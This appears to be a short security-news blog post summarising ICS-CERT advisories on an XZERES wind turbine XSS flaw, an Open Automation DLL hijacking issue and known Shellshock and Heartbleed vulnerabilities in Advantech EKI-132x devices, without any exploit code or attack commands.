This afternoon the DHS ICS-CERT updated the XZERES advisory published earlier this week. It also published controls system advisories for products from Open Automation and Advantech.
This update revises the description of the potential impact of the vulnerability. Originally it said that: “Successful exploitation of this vulnerability allows the ID to be retrieved from the browser and will allow the default ID to be changed.” Now it reads: “Successful exploitation of this vulnerability could allow the injection of malicious script.” That is a significant change in impact.
The description of the cross-site scripting vulnerability has also been changed. Originally it said: “The 442SR OS recognizes both the POST and GET methods for data input. By using the GET method, an attacker may retrieve the ID from the browser and will allow the default user ID to be changed. The default user has admin rights to the entire system.” It now reads: “The 442SR OS does not provide adequate input validation. This could allow malicious script to be injected into the program.” The CVSS v3 base score remains 9.8.
NOTE: This update is listed on the ICS-CERT landing page, but just because the original would still be there and the change was made to the original listing. I still recommend following @ICSCERT on TWITTER to get notified of these updates.
Open Automation Advisory
This advisory describes an uncontrolled search path element vulnerability in the Open Automation Software OPC Systems.NET application. The vulnerability was reported by Ivan Sanchez from Nullcode Team. ICS-CERT reports that Open Automation Software does not intend to patch the vulnerability at this time.
ICS-CERT reports that a social engineering attack is required to exploit this DLL hijacking vulnerability. A successful exploit would give the attacker access at the same privilege level as the application.
ICS-CERT reports that: “Open Automation Software has passed the researcher information to its support team to assist customers in the event that they encounter this vulnerability.”
This advisory describes three vulnerabilities in the Advantech EKI-132x platform devices. This was an uncoordinated disclosure made by Tod Beardsley of Rapid7. Advantech plans to release updated firmware to fix these vulnerabilities by the end of this month.
The three vulnerabilities are:
• OS command injection (Shellshock) - CVE-2014-6271;
• Improper restriction of operations within the bounds of a memory buffer (Heartbleed) - CVE-2014-0160; and
• Improper restriction of operations within the bounds of a memory buffer - CVE-2012-2152
ICS-CERT reports that a relatively unskilled attacker could remotely exploit these vulnerabilities using publicly available exploit code to execute arbitrary code, to obtain private keys, or to impersonate the authenticated user and perform a man-in-the-middle attack.